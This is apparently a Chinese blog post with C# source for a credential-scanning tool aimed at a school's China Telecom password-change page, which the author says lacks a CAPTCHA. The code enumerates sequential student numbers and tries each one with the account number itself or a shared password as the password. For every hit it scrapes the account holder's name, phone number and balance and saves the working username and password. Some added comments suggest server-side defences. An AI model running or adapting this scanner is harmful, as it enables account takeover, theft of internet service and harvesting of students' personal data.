最近发现我们学校电信上网的改密码页面很简单,没有验证码,于是很好奇。后来发现这个改密码页面存在漏洞,可以通过扫描账号来免费上网。

原理就是对修改密码的页面进行POST请求

如果密码账号正确就返回200

下面是C#的网络操作类

using System;
using System.IO;
using System.Net;
using System.Text;
using System.Collections.Generic;
using System.Text.RegularExpressions; namespace scan
{
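/// <summary>
/// Synchronous HTTP helper built on <see cref="WebRequest"/> / <see cref="HttpWebRequest"/>,
/// plus a regex-based routine that strips HTML markup from a response body.
/// </summary>
/// <remarks>
/// No method here sets a request timeout, so the framework defaults apply.
/// Form data is sent exactly as supplied: names and values are NOT URL-encoded by this class.
/// </remarks>
public class zzHttp
{
    private const string sContentType = "application/x-www-form-urlencoded";

    // Declared by the original author but never applied to a request (the assignment was commented out).
    private const string sUserAgent = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727)";

    // Patterns removed by ClearHtml, applied one after another in this exact order.
    // Repeated entries are deliberate: removing one tag can splice the text around it into a
    // new match, which a later pass of the same pattern then removes.
    // NOTE(review): the two " " entries are a bare space as rendered on the page; they may have
    // been the nbsp entity in the author's source — confirm.
    private static readonly string[] StripPatterns =
    {
        "&#[^>]*;",
        "</?marquee[^>]*>",
        "</?object[^>]*>",
        "</?param[^>]*>",
        "</?embed[^>]*>",
        "</?table[^>]*>",
        " ",
        "</?tr[^>]*>",
        "</?th[^>]*>",
        "</?p[^>]*>",
        "</?a[^>]*>",
        "</?img[^>]*>",
        "</?tbody[^>]*>",
        "</?li[^>]*>",
        "</?span[^>]*>",
        "</?div[^>]*>",
        "</?th[^>]*>",
        "</?td[^>]*>",
        "</?script[^>]*>",
        "(javascript|jscript|vbscript|vbs):",
        "on(mouse|exit|error|click|key)",
        "<\\?xml[^>]*>",
        "<\\/?[a-z]+:[^>]*>",
        "</?font[^>]*>",
        "</?b[^>]*>",
        "</?u[^>]*>",
        "</?i[^>]*>",
        "</?strong[^>]*>",
        "</?strong[^>]*>",
        " ",
    };

    /// <summary>
    /// POSTs <paramref name="data"/> as UTF-8 bytes and returns the response body.
    /// </summary>
    /// <param name="data">Request body; sent as-is with a form-urlencoded content type.</param>
    /// <param name="url">Target URL.</param>
    /// <returns>The response body decoded as UTF-8.</returns>
    public static string Send(string data, string url)
    {
        return Send(Encoding.UTF8.GetBytes(data), url);
    }

    /// <summary>
    /// POSTs a raw byte payload and returns the response body decoded as UTF-8.
    /// </summary>
    /// <param name="data">Request body bytes.</param>
    /// <param name="url">Target URL; must resolve to an HTTP(S) request.</param>
    /// <returns>The response body.</returns>
    /// <exception cref="ArgumentNullException"><paramref name="data"/> is null.</exception>
    /// <exception cref="ApplicationException">The URL does not produce an <see cref="HttpWebRequest"/>.</exception>
    public static string Send(byte[] data, string url)
    {
        // Reject a null payload before any request object is created, instead of
        // failing later with a NullReferenceException on data.Length.
        if (data == null)
        {
            throw new ArgumentNullException("data");
        }

        HttpWebRequest request = WebRequest.Create(url) as HttpWebRequest;
        if (request == null)
        {
            throw new ApplicationException(string.Format("Invalid url string: {0}", url));
        }

        request.ContentType = sContentType;
        request.Method = "POST";
        request.ContentLength = data.Length;

        using (Stream requestStream = request.GetRequestStream())
        {
            requestStream.Write(data, 0, data.Length);
        }

        // Exceptions from GetResponse propagate unchanged. The original caught and re-threw
        // with "throw exception;", which only discarded the stack trace.
        using (WebResponse response = request.GetResponse())
        using (Stream responseStream = response.GetResponseStream())
        using (StreamReader reader = new StreamReader(responseStream, Encoding.UTF8))
        {
            return reader.ReadToEnd();
        }
    }

    #region Synchronous POST
    /// <summary>
    /// Sends form data with POST, encoded as gb2312, and returns the response decoded as gb2312.
    /// </summary>
    /// <param name="Url">Target URL.</param>
    /// <param name="postDataStr">Form body, already in name=value&amp;name=value form.</param>
    /// <param name="cookie">
    /// Cookie container to use. When it is null or empty it is replaced by a fresh container,
    /// which is handed back to the caller through the ref parameter.
    /// </param>
    /// <returns>The response body.</returns>
    public string SendDataByPost(string Url, string postDataStr, ref CookieContainer cookie)
    {
        HttpWebRequest request = (HttpWebRequest)WebRequest.Create(Url);
        if (cookie == null || cookie.Count == 0)
        {
            cookie = new CookieContainer();
        }
        request.CookieContainer = cookie;

        request.Method = "POST";
        request.ContentType = "application/x-www-form-urlencoded";

        // Content-Length must be the encoded byte count. The original used the character
        // count, which is too small as soon as the body holds a multi-byte gb2312 character.
        Encoding gb2312 = Encoding.GetEncoding("gb2312");
        byte[] body = gb2312.GetBytes(postDataStr);
        request.ContentLength = body.Length;

        using (Stream requestStream = request.GetRequestStream())
        {
            requestStream.Write(body, 0, body.Length);
        }

        using (HttpWebResponse response = (HttpWebResponse)request.GetResponse())
        using (Stream responseStream = response.GetResponseStream())
        using (StreamReader reader = new StreamReader(responseStream, gb2312))
        {
            return reader.ReadToEnd();
        }
    }
    #endregion

    #region Synchronous GET
    /// <summary>
    /// Sends a GET request and returns the response decoded as UTF-8.
    /// </summary>
    /// <param name="Url">Target URL without query string.</param>
    /// <param name="postDataStr">Query string (despite the name); appended after "?" unless it is empty.</param>
    /// <param name="cookie">
    /// Cookie container to use. When it is null or empty it is replaced by a fresh container,
    /// which is handed back to the caller through the ref parameter.
    /// </param>
    /// <returns>The response body.</returns>
    public string SendDataByGET(string Url, string postDataStr, ref CookieContainer cookie)
    {
        string target = Url + (postDataStr == "" ? "" : "?") + postDataStr;
        HttpWebRequest request = (HttpWebRequest)WebRequest.Create(target);
        if (cookie == null || cookie.Count == 0)
        {
            cookie = new CookieContainer();
        }
        request.CookieContainer = cookie;

        request.Method = "GET";
        request.ContentType = "text/html;charset=UTF-8";

        using (HttpWebResponse response = (HttpWebResponse)request.GetResponse())
        using (Stream responseStream = response.GetResponseStream())
        using (StreamReader reader = new StreamReader(responseStream, Encoding.GetEncoding("utf-8")))
        {
            return reader.ReadToEnd();
        }
    }
    #endregion

    /// <summary>
    /// Best-effort GET: returns the response body, or an empty string on any failure.
    /// </summary>
    /// <param name="Url">Target URL without query string.</param>
    /// <param name="getdata">Query string; appended after "?" unless it is empty.</param>
    /// <param name="type">Name of the encoding used to decode the response.</param>
    /// <returns>The response body, or "" when anything goes wrong.</returns>
    /// <remarks>
    /// The request is not cast to <see cref="HttpWebRequest"/>, so the scheme is whatever
    /// <see cref="WebRequest.Create(string)"/> accepts. Do not pass a URL taken from untrusted
    /// input without first restricting it to http/https and to the hosts you expect.
    /// </remarks>
    public string zzget(string Url, string getdata, string type)
    {
        try
        {
            WebRequest request = WebRequest.Create(Url + (getdata == "" ? "" : "?") + getdata);
            request.Method = "GET";
            request.ContentType = "text/html;charset=UTF-8";

            using (WebResponse response = request.GetResponse())
            using (Stream responseStream = response.GetResponseStream())
            using (StreamReader reader = new StreamReader(responseStream, Encoding.GetEncoding(type)))
            {
                return reader.ReadToEnd();
            }
        }
        catch (Exception)
        {
            // Deliberate best-effort contract kept from the original: a bad URL, an unknown
            // encoding name and a network error all look the same to the caller ("").
            return "";
        }
    }

    /// <summary>
    /// Sends a dictionary of form fields with POST and returns the response body.
    /// </summary>
    /// <param name="URL">Target URL.</param>
    /// <param name="strPostdata">Form fields, joined as key=value pairs separated by "&amp;".</param>
    /// <param name="strEncoding">Name of the encoding used to decode the response.</param>
    /// <returns>The response body.</returns>
    /// <remarks>
    /// Keys and values are concatenated without URL-encoding, so a value containing "&amp;" or "="
    /// changes the shape of the form. The body is encoded with <see cref="Encoding.Default"/>,
    /// which depends on the machine the code runs on.
    /// </remarks>
    public string zzpost(string URL, IDictionary<string, Object> strPostdata, string strEncoding)
    {
        // Insert the separator before every pair but the first. The original appended "&" after
        // each pair and then removed the last character, which throws on an empty dictionary.
        StringBuilder data = new StringBuilder();
        foreach (KeyValuePair<string, Object> param in strPostdata)
        {
            if (data.Length > 0)
            {
                data.Append("&");
            }
            data.Append(param.Key).Append("=").Append(param.Value);
        }

        HttpWebRequest request = (HttpWebRequest)WebRequest.Create(URL);
        request.CookieContainer = new CookieContainer(); // the author notes that login fails without this line
        request.Method = "POST"; // HTTP method names are case-sensitive; the original sent "post"
        request.Accept = "text/html, application/xhtml+xml, */*";
        request.ContentType = "application/x-www-form-urlencoded";

        byte[] buffer = Encoding.Default.GetBytes(data.ToString());
        request.ContentLength = buffer.Length;
        using (Stream requestStream = request.GetRequestStream())
        {
            requestStream.Write(buffer, 0, buffer.Length);
        }

        using (HttpWebResponse response = (HttpWebResponse)request.GetResponse())
        using (StreamReader reader = new StreamReader(response.GetResponseStream(), Encoding.GetEncoding(strEncoding)))
        {
            return reader.ReadToEnd();
        }
    }

    /// <summary>
    /// Strips a fixed list of HTML tags and then ALL whitespace from the text.
    /// </summary>
    /// <param name="Content">Text to clean; null is treated as empty.</param>
    /// <returns>The text with the listed markup and every whitespace character removed.</returns>
    /// <remarks>
    /// This is a text-extraction helper, not an HTML sanitizer. It is a deny-list of tag-name
    /// prefixes (for example the "b" pattern also removes &lt;br&gt; and &lt;body&gt;), unlisted tags pass
    /// through, and the result must still be HTML-encoded before it is written into a page.
    /// </remarks>
    public static string ClearHtml(string Content)
    {
        foreach (string pattern in StripPatterns)
        {
            Content = Zxj_ReplaceHtml(pattern, "", Content);
        }

        // Every whitespace run is deleted, so words are joined together. The original followed
        // this with a Trim() whose result was discarded; there is nothing left to trim anyway.
        return Regex.Replace(Content, @"\s+", "");
    }

    /// <summary>
    /// Replaces every case-insensitive match of a regular expression in the text.
    /// </summary>
    /// <param name="patrn">Regular expression to match.</param>
    /// <param name="strRep">Replacement text.</param>
    /// <param name="content">Text to process; null is treated as empty.</param>
    /// <returns>The text after replacement; never null.</returns>
    private static string Zxj_ReplaceHtml(string patrn, string strRep, string content)
    {
        return Regex.Replace(content ?? "", patrn, strRep, RegexOptions.IgnoreCase);
    }
}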
}

然后对某个网址进行post请求

 // Start the scan: build candidate account numbers and queue one login attempt per candidate.
// The enclosing class (apparently a form: beginclass/endclass are read via .Text) and the
// members GetValue, CountProcess, CheckThreadPool and rhw are not shown on this page.
//
// NOTE(review, defensive): on the server side this shows up as one client submitting a long run
// of sequential account numbers, each with either password == account number or one shared
// password. Per-account lockout sees a single failure per account, so throttle and alert per
// source address and on the number of distinct accounts attempted, and do not issue the
// account number as the initial password.
public void scan()
{
bool flag = false;
// V[0] = fixed infix of the account number, V[1] = password to try,
// V[2] / V[3] = upper bounds of the two inner loops (presumably classes per grade and
// students per class — confirm against GetValue).
object[] V= GetValue();
string no = V[0].ToString();
string userpass = V[1].ToString();
int cnum = int.Parse(V[2].ToString());
// flag is set when no password was supplied; each account number is then tried as its own password.
int snum = int.Parse(V[3].ToString()); if (userpass.Length <= 0)
flag = true;
zzHttp http = new zzHttp();
// Placeholder left by the author ("fill in the URL you need here"); no real endpoint is given.
string url = "这儿填你需要的网址";
// Count the worker threads
ThreadPool.QueueUserWorkItem(new WaitCallback(CountProcess)); // next line: check whether the threads have finished
// The event is created unsignaled and no reference to it is kept here, so the callback
// presumably fires on the 1000 ms timeout, repeatedly (executeOnlyOnce is false).
rhw = ThreadPool.RegisterWaitForSingleObject(new AutoResetEvent(false), this.CheckThreadPool, null, 1000, false);
// int.Parse throws FormatException on non-numeric text; nothing here validates the two fields.
int begin = int.Parse(beginclass.Text);
int end = int.Parse(endclass.Text);
for (int m = begin; m <= end; m++)// loop over the grades
{ for (int j = 1; j <= cnum; j++)
{
// tmp = grade + infix + j, with j zero-padded to two digits
string tmp = "";
if (j < 10)
tmp = m + no + "0" + j;
else
tmp = m + no + j;
for (int i = 1; i <= snum; i++)
{
string tempstuno = "";// the constructed student number: tmp + i, with i zero-padded to two digits
if (i < 10)
tempstuno = tmp + "0" + i;
else
tempstuno = tmp + i;
// Message text: "<checking...>"
AddAccountMessage( tempstuno + "<正在检查...>");
// Every candidate is queued immediately; the loop has no delay or cap of its own.
if (flag)
{
// No password supplied: the account number is passed as both user name and password.
scanuser s = new scanuser(http, url, tempstuno, tempstuno, this);
// threadReceive = new Thread(new ThreadStart(s.login));
ThreadPool.QueueUserWorkItem(new WaitCallback(s.login));
}
else
{
// The same supplied password is tried against every account number.
scanuser s = new scanuser(http, url, tempstuno, userpass, this);
//threadReceive = new Thread(new ThreadStart(s.login));
ThreadPool.QueueUserWorkItem(new WaitCallback(s.login));
}
//threadReceive.Start();
}
}
}
}

下面是扫描类

// Scan worker: holds one user name / password pair and submits it to the target URL.
// Form1, Color and write_txt are referenced but not defined on this page.
//
// NOTE(review, defensive): the worker depends on two properties of the endpoint — it answers a
// credential submission with the account's details (name, phone number, balance) and it accepts
// attempts without a CAPTCHA, as the page states. Throttling attempts server-side and returning
// no personal data before a full authenticated session exists remove both.
class scanuser
{
public Form1 F = null;
zzHttp http;
string url;
string username;
string userpass;
// Stores the pair to test together with the shared HTTP helper, the target URL and the form
// that receives status messages.
public scanuser(zzHttp http, string url, string username, string userpass, Form1 F)
{
this.F = F;
this.http = http;
this.username = username;
this.userpass = userpass;
this.url = url;
}
// Submits the pair and reports the outcome to the form. The signature matches WaitCallback so
// it can be queued on the thread pool; stateInfo is not used.
public void login(Object stateInfo)
{
// The values are inserted without URL-encoding.
string postdata = String.Format("name={0}&password={1}", username, userpass);
CookieContainer cookie = new CookieContainer();
try
{
// Success is recognised by the label "客户名称" (customer name) appearing in the response body.
string ret = http.SendDataByPost(url, postdata, ref cookie); if (ret.Contains("客户名称"))
{
ret = zzHttp.ClearHtml(ret);// strip the surplus HTML
// Everything below parses the stripped page by fixed character offsets from a label. A
// missing label makes LastIndexOf return -1, and a short page makes Substring throw
// ArgumentOutOfRangeException, which the catch below reports as a network failure.
// Extract the customer name
int pos = ret.LastIndexOf("客户名称");
string name = ret.Substring(pos + 5, 2);// name assumed to be two characters
string tmp = ret.Substring(pos + 7, 1);// possible third character
// "联" is presumably the first character of the "联系电话" (contact phone) label that follows a two-character name.
if (tmp != "联")
name = name + tmp;
// Extract the mobile number
pos = ret.LastIndexOf("联系电话");
string tel = ret.Substring(pos + 5, 11);
// Accept only 11 digits starting with 1; otherwise record "无" (none).
Regex regex = new Regex("^1\\d{10}$");
if (!regex.IsMatch(tel))
tel = "无";
// Extract the prepaid balance ("预存款余额(RMB)")
pos = ret.LastIndexOf("预存款余额(RMB)");
string money = ret.Substring(pos + 11,5);
tmp = ret.Substring(pos+16,1);
if (tmp != "<")
money += tmp; // Determine the bandwidth; check for a remark first. NOTE(review): as rendered on this page the declaration string width = "2M"; sits inside this comment, so width is undeclared below; it was presumably a separate statement before the line breaks were lost.
// "独享" = dedicated line; the bandwidth is then taken from whichever size string appears in the page.
if (ret.Contains("独享"))
{
if (ret.Contains("4M"))
width = "4M";
else if (ret.Contains("6M"))
width = "6M";
else if (ret.Contains("8M"))
width = "8M";
else if (ret.Contains("12M"))
width = "12M"; }
// "有效" = account active
if (ret.Contains("有效"))
{ //F.AddScanMessage("\n");
F.Setcolor(Color.Green);
F.AddScanMessage(username + "<有效," + name + "," + tel + ",$=" + money + "," + width + ">");
// write_txt is not shown; it receives the user name, the password, the name and the bandwidth.
write_txt(username,userpass,name,width);
}
// "停机" = service suspended
else if (ret.Contains("停机"))
{
//F.AddScanMessage("\n");
F.Setcolor(Color.Red);
F.AddScanMessage(username + "<停机,"+ name + "," + tel + ">");
}
}
// Any exception, including the parsing failures noted above, is shown as "网络故障..." (network failure).
}catch(Exception ex)
{
F.Setcolor(Color.Yellow);
F.AddScanMessage("网络故障..."+ex.Message);
}
}
}
